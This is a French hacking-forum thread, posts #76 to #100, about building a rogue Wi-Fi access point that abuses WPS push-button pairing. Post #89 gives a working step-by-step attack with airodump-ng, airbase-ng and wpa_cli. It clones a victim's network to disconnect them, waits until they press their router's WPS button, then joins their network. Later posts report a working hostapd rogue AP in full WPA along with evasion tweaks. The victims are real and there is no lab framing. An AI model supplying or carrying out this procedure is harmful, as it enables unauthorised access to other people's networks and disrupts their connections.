Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#76 20-03-2014 17:39:32

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Projet: rogue AP/WPS

Conclusion,

Quelqu'un a réussi à faire une RogueAP en WPA avec le support du WPS (depuis Linux ou Windows) pour que lors de la connection à celle-ci, cela soit affiché comme ça :

831_win7-connexion-5.jpg

Si le client vient sur la fausse box et qu'il appuie sur le bouton de ça box, alors la porte devient ouverte.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#77 24-03-2014 20:11:35

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Of course you got it ! wink

Hors Ligne

#78 24-03-2014 21:49:40

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Projet: rogue AP/WPS

pourquoi un rogue AP local réagi vite avec android et il nous fatigue avec windows?

Hors Ligne

#79 25-03-2014 09:25:42

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Le sens de ta question est un peu ambigu...

Hors Ligne

#80 01-04-2014 20:13:42

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Salut ! smile

Avec l'envie d'utiliser hostapd a la place d'un routeur déja équipé du WPS et après une bataille avec la version 2.0 d'hostapd et kali 1.0.6 pour les faire s'entendre (conflit entre certaine lib et network-manager), j'ai réussi la moitié du chemin en implémentant le WPS a hostapd.Pourquoi la moitié ? car je peux me connecter via mon android 4.2.2 sans problème mais pas avec cette daub de win7**** pam alors que ça marche bien si je prend un vrai routeur équiper du WPS.

Les infos plus en détails avec la connexion de mon android:

./hostapd.sh
[ ok ] Stopping network connection manager: NetworkManager already stopped.
[ ok ] Restarting DNS forwarder and DHCP server: dnsmasq.
net.ipv4.ip_forward = 1
Configuration file: /etc/hostapd.conf
Using interface wlan0 with hwaddr 4c:0f:6e:f6:97:20 and ssid "Sfrbox"
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.11: authenticated
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED 80:57:19:4d:ec:03
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=254
wlan0: WPS-REG-SUCCESS 80:57:19:4d:ec:03 17e0fd8b-714c-5926-9b61-d1e87796d23c
wlan0: WPS-SUCCESS 
wlan0: CTRL-EVENT-EAP-FAILURE 80:57:19:4d:ec:03
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.1X: authentication failed - EAP type: 0 ((null))
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.1X: Supplicant used different EAP type: 254 (expanded)
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.11: disassociated
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.11: authenticated
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.11: associated (aid 1)
wlan0: AP-STA-CONNECTED 80:57:19:4d:ec:03
wlan0: STA 80:57:19:4d:ec:03 RADIUS: starting accounting session 533B06E8-00000000
wlan0: STA 80:57:19:4d:ec:03 WPA: pairwise key handshake completed (RSN)

Malgré ces lignes:

wlan0: STA 80:57:19:4d:ec:03 IEEE 802.1X: authentication failed - EAP type: 0 ((null))
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.1X: Supplicant used different EAP type: 254 (expanded)
wlan0: STA 80:57:19:4d:ec:03 IEEE 802.11: disassociated

la connexion se fait rapidement.La meme tentative avec windows7/64:

./hostapd.sh
[ ok ] Stopping network connection manager: NetworkManager.
[ ok ] Restarting DNS forwarder and DHCP server: dnsmasq.
net.ipv4.ip_forward = 1
Configuration file: /etc/hostapd.conf
Using interface wlan0 with hwaddr 4c:0f:6e:f6:97:20 and ssid "Sfrbox"
wlan0: WPS-TIMEOUT 
wlan0: STA 00:c0:ca:75:88:87 IEEE 802.11: disassociated due to inactivity
wlan0: STA 00:c0:ca:75:88:87 IEEE 802.11: deauthenticated due to inactivity (timer DEAUTH/REMOVE)
wlan0: WPS-TIMEOUT 

J'ai des TIMEOUT qui sortent de chez pas trop d'ou et de plus je ne vois pas l'image que InconnuX a posté 4 post plus haut lors de la connexion.Meme avec l'aide de hostapd_cli

hostapd_cli wps_pbc
Selected interface 'wlan0'
OK

ça semble bon pourtant:

hostapd_cli get_config
Selected interface 'wlan0'
bssid=4c:0f:6e:f6:97:20
ssid=Sfrbox
wps_state=configured
passphrase=123456789
psk=788367e3b9b56e6487843efd8034aadd6e0c61fcb35a8a863658438a817829bc
key_mgmt=WPA-PSK 
group_cipher=TKIP
rsn_pairwise_cipher=TKIP

Conf WPS dans le hostapd.conf:

wps_state=2
ap_setup_locked=0
config_methods=label display push_button keypad
pbc_in_m1=1

Quand a ctrl_interface=/var/run/hostapd est activé aussi, je vois pas trop d'ou ça peut venir hmm j'ai du passer a coté de quelque chose je pense.

Dernière modification par koala (01-04-2014 20:18:50)

Hors Ligne

#81 01-04-2014 20:38:39

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Projet: rogue AP/WPS

je reformule ma question #78, quand j'ai mis en place un rogue AP local, j'ai testé la redirection de la fackepage avec 2 OS,

avec Andriod, j'ai pu me connecté au rogue AP trés facilement et j'ai pu rediriger la page et saisir la clé
avec Win7 était trés difficile " windows n'a pas pu se connecter au ....." aprés plusieurs tantatives j'ai pu me connecter et rediriger  la page

pourquoi cette réaction différente?

Hors Ligne

#82 02-04-2014 01:20:40

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Le problème est complètement différent... le sujet parle ici de rogue AP utilisant le WPS et en réseau ouvert tu devrais pouvoir te connecter a ta rogue avec windows, check ta config.

Dernière modification par koala (02-04-2014 01:21:10)

Hors Ligne

#83 02-04-2014 22:48:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Pour ceux qui douterai encore de l'efficacité que peut avoir cette méthode (bien sur ça dépend de la version de votre windows)

SFR_a340 est le fake créer par hostapd
SFR_A340 la vrai box sfr (dans l'image il indique accès internet mais il a accès a rien du tout, le client passe son temps a essayer de se reconnecter au réseau sans y arriver mais si le fake est sélectionner la connexion va se faire sans problème).
Notez également que si vous etes proche, le fakeAP vient en premier et le vrai réseau passe a la trappe avec sa croix rouge big_smile

g7od.bmp

Dernière modification par koala (02-04-2014 22:49:53)

Hors Ligne

#84 03-04-2014 07:59:22

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Projet: rogue AP/WPS

je vois qu'il est crypté avec WPA-PSK, alors comment la victime peut se connecter et tombe dans la fackepage?

Hors Ligne

#85 03-04-2014 08:47:17

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

FFOO31 a écrit :

je vois qu'il est crypté avec WPA-PSK, alors comment la victime peut se connecter et tombe dans la fackepage?

Tu suis pas beaucoup le sujet tongue c'est une rogueAP utilisant le WPS avec la méthode PBC pour laisser le client se connecter.Je suis en train de voir pour améliorer un peu tout ça sans avoir a faire appel a un routeur déja équiper du WPS mais juste avec le PBC, hostapd et windows7 et c'est délicat smile

Hors Ligne

#86 03-04-2014 11:24:14

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Projet: rogue AP/WPS

Je ne sais pas si tu as jetté un coup d'oeil à ceci ou si ça peut t'aider. jenssegers / RTL8188-hostapd
Quel est le chipset de ton adaptateur wireless?

Hors Ligne

#87 03-04-2014 13:57:54

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

J'essai avec le plus basique l'intégré a l'ordinateur pour l'instant, l'ath9k(AR9285).

Merci pour le lien c'est bon a savoir cool

Dernière modification par koala (03-04-2014 14:00:25)

Hors Ligne

#88 04-04-2014 20:19:46

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Je crois avoir localisé l'erreur que j'ai avec en hostapd quand un client windows tente de s'y connecter via le WPS mais ça me permet pas pour autant de la résoudre, maintenant juste après le WPS_TIMEOUT quand je tente de me connecter via le WPS il me vient une nouvelle erreur plus significative que le TIMEOUT en lui meme:
"CTRL_IFACE monitor[0]: 111 - Connection refused"

En parcourant le net j'ai pu trouver une explication qui pourrait confirmer ce que je pensais depuis l'autre jour, a savoir que hostapd ne sait pas communiquer correctement avec windows et pour une raison inconnue le fou a la porte lors de la connexion.L'explication:

But from the other hand I don't know why the connection is refused 

Some upper layer assumes that a timed out association (client sent
the 802.11 association request packet, but did not receive the 802.11
association response packet) equals to a "connection refused" error.
That's a follow-up error. The first error is more important here.
and then wpa_supplicant is putting the AP to the "blacklist".   

supplicant tried to associate to this AP. But this AP didn't
answer. So for now, wpa_supplicant assumes that this AP is broken.
Therefore the AP ends up on the blacklist. This makes sure that on
the next try (if you have more than one AP), it won't be tried again,
but a another one instead.


La j'avoue que je commence a caler pour trouver une solution a un problème qui n'a pas l'air évident a régler hmm

Dernière modification par koala (04-04-2014 20:21:03)

Hors Ligne

#89 05-04-2014 14:19:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

En attendant de résoudre le problème d'hostapd (j'ai le temps je suis en vacances d'ou ma présence plus forte sur le forum cool ), je vous propose une solution expérimental avec kali linux et un routeur équipé du WPS (si vous avez une livebox2 neufbox5/6 ou autre TP-LINK, NETGEAR assez récent pour supporter le WPS c'est bon).

Lancer votre Fake AP (le routeur équipé du WPS donc) par exemple si vous voulez un réseau qui s'appelle Livebox-1d2e il faudra pas le nommer tel quel car windows ne le reconnaitra pas dans le gestionnaire sans fil (eh oui...), donc nommez le juste livebox-1d2e ça fera l'affaire.Une fois fait, sous windows vous devriez voir ça:

hf95.bmp

On continu

airmon-ng start wlan0
airodump-ng --encrypt wpa mon0

Sélectionnez votre réseau puis faite lui passé ses propres paramètres en commande:

airbase-ng -c CANAL -e ESSID -a BSSID -0 mon0

Il y a d'autres alternatives avec d'autres commandes airbase si celle-la ne suffit pas a faire planter la connexion de la victime, renseignez vous sur airbase-ng.


Revenons a nos moutons, ouvrez une seconde console puis lancer wpa_cli:

sudo wpa_cli
scan
scan_results

Entre temps airbase va semer le b**** dans le gestionnaire sans fil de la victime et au bout de quelques minutes, cette dernière va se retrouver déconnecter de son réseau, vous devriez alors voir ça sur l'ordinateur windows de la victime:

dv0h.bmp

La victime est bien ennuyée car elle peut plus se connecter mais elle aperçoit le réseau "livebox-1d2e" en première place (si vous etes proche) ça parait logique et c'est ce que font la plupart des gens ils se connectent en cliquant sur le réseau, la victime verra alors ça:
9wr9.bmp

Comme indiqué il faut appuyer sur le bouton du routeur, et c'est ce que fait la personne sous windows (ne toucher a rien sur votre routeur pendant ce temps).Dans votre fenetre wpa_cli vous verrez alors quelque chose comme ça:

<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-PBC-AVAILABLE 
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-PBC-AVAILABLE 

De la vous saurez que c'est le moment de vous connecter:

wps_pbc any BSSID du réseau

Mais si vous etes feignant comme moi vous prendrez votre android pour vous connecter via le PBC et vue que ce dernier vient juste d'etre activé vous vous connecterai sans problème cool ah les vacances ça donne des idées big_smile

J'aimerais quand meme réussir a faire fonctionner hostapd et son WPS pour attirer la victime sur le fakeAP et non pas faire en sorte qu'elle appui sur son bouton WPS, ça serait plus élégant comme méthode... roll


Ps: ce test est basé sur une victime possédant windows7/64 bits je ne sais pas si cette méthode est valable pour les windows vista ou windows 8, il faudrait justement savoir si le supplicant de windows gère sa sous vista et 8.


Quelque soit le résultat de vos test rapportez le ici de façon a savoir sur quel config ça marche, quel OS sur l'ordinateur de la victime, quel routeur équipé du WPS avez vous utilisé pour faire le fakeAP etc...Vous avez tout les commandes sous les yeux et c'est radicalement simple donc au boulot et pas d'excuses ! tongue

Dernière modification par koala (05-04-2014 14:20:07)

Hors Ligne

#90 06-04-2014 08:20:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Le problème avec hostapd est résolu ! smile

J'ai fini par y arriver, les deux paramètres restants qui me bloquaient, l'uuid et l'os_version.Une fois que tout est lancer il y a plus qu'a surveiller la connexion entrante dans la fenetre d'hostapd et quand c'est le cas lancer "wps_pbc" avec hostapd_cli, le client se copnnecte en suivant a la rogue.

On peut avoir une rogueAP en full WPA maintenant big_smile c'est pas mieux qu'une rogue en open pas discrète du tout ? tongue


Je ferai un tuto si ça intéresse suffisemment smile

Dernière modification par koala (06-04-2014 08:21:54)

Hors Ligne

#91 06-04-2014 10:03:18

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Projet: rogue AP/WPS

Super smile Bravo à toi pour avoir trouver ça wink
Moi ca m'intéresse ton tuto même si tu as donner assez d'explications pour y arriver, c'est toujours mieux smile

koala a écrit :

Lancer votre Fake AP (le routeur équipé du WPS donc) par exemple si vous voulez un réseau qui s'appelle Livebox-1d2e il faudra pas le nommer tel quel car windows ne le reconnaitra pas dans le gestionnaire sans fil (eh oui...), donc nommez le juste livebox-1d2e ça fera l'affaire

Tu es sûre de toi ?
C'est pas plutôt, windows affiche qu'un seul réseau Wifi que si les deux AP ont le même ESSID et le même BSSID ?

Parce que 2 AP avec juste le même ESSID (BSSID différent), je vois les deux noms dans le gestionnaire Wifi de Windows 7 (pour un OPN et l'autre WPA)...

Hors Ligne

#92 06-04-2014 10:23:36

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Salut InconnuX smile

InconnuX a écrit :

Tu es sûre de toi ?
C'est pas plutôt, windows affiche qu'un seul réseau Wifi que si les deux AP ont le même ESSID et le même BSSID ?
Parce que 2 AP avec juste le même ESSID (BSSID différent), je vois les deux noms dans le gestionnaire Wifi de Windows 7 (pour un OPN et l'autre WPA)...


C'est normal car ils ont une sécurité et une encryption différente, c'est le principe meme de airbase-ng qui ouvre un réseau en open mais dans le cas du fakeAP en WPA si tu donne a ton fake le meme ESSID la meme sécurité, et la meme encryption, ils ont beau avoir un BSSID différent ça coincera car windows ignore le nouveau réseau dans le gestionnaire sans fil(du moins sur mon windows c'est comme ça que ça se passe, après c'est windows...).

Donc le but n'étant pas que le nouveau réseau arrivant sois ignoré (le fakeAP) je change juste la majuscule a la minuscule et ça passe wink

Dernière modification par koala (06-04-2014 10:24:54)

Hors Ligne

#93 06-04-2014 11:51:59

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Projet: rogue AP/WPS

Effectivement, tu as raison, je viens de tester wink

ESSID et ENCRYPTION identiques + BSSID et CHANNEL différents = Une seule AP visible.

Mais on peut contourner ça avec un espace placé à la fin du nom wink

 -e "NEUF_XXXX " 

Dernière modification par InconnuX (06-04-2014 11:58:04)

Hors Ligne

#94 06-04-2014 12:15:40

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

InconnuX a écrit :

Mais on peut contourner ça avec un espace placé à la fin du nom

Avec airbase peut-etre mais avec hostapd apparemment non wink

Hors Ligne

#95 06-04-2014 15:30:39

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Projet: rogue AP/WPS

C'est mort pour moi hmm
J'ai une Alfa en rtl8187 et Hostapd ne fonctionne pas avec.
Apparement le driver ne supporte pas le mode master.

Hors Ligne

#96 06-04-2014 19:09:52

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Je confirme, mais tu peux utiliser le chipset intégrer a ton ordi si c'est de l'atheros smile

Hors Ligne

#97 07-04-2014 08:02:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

koala a écrit :

Avec airbase peut-etre mais avec hostapd apparemment non

Autant pour moi c'est possible aussi smile

Hors Ligne

#98 07-04-2014 12:34:34

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : Projet: rogue AP/WPS

Non malheuresement je n'ai pas d'atheros.
J'essayerai de récupérer une carte wifi compactible wink

Hors Ligne

#99 07-04-2014 18:11:32

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Projet: rogue AP/WPS

Ok smile

De mon coté j'ai pu avoir accès au pc d'un pote qui est sous windows 8 est c'est sans surprise que je constate que le WPS est bien intégrer au suppliccant de windows tongue

Reste a voir pour vista, mais la j'ai des gros doutes.

Hors Ligne

#100 07-04-2014 20:23:25

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Projet: rogue AP/WPS

C'est tout du moins possible avec Vista service pack2 si on en croit l'aide officielle de mister gate
Microsoft / To add a wireless computer running Windows 7 or Windows Vista Service Pack 2 by using a push button

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 54 Aujourd'hui 03:23:31 par Morpheus_Dotcom
106 2171 28-11-2016 19:42:10 par koala
35 1793 23-11-2016 16:31:33 par roofnat
16 1042 17-11-2016 12:22:00 par disquette
10 427 11-11-2016 22:11:03 par koala

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]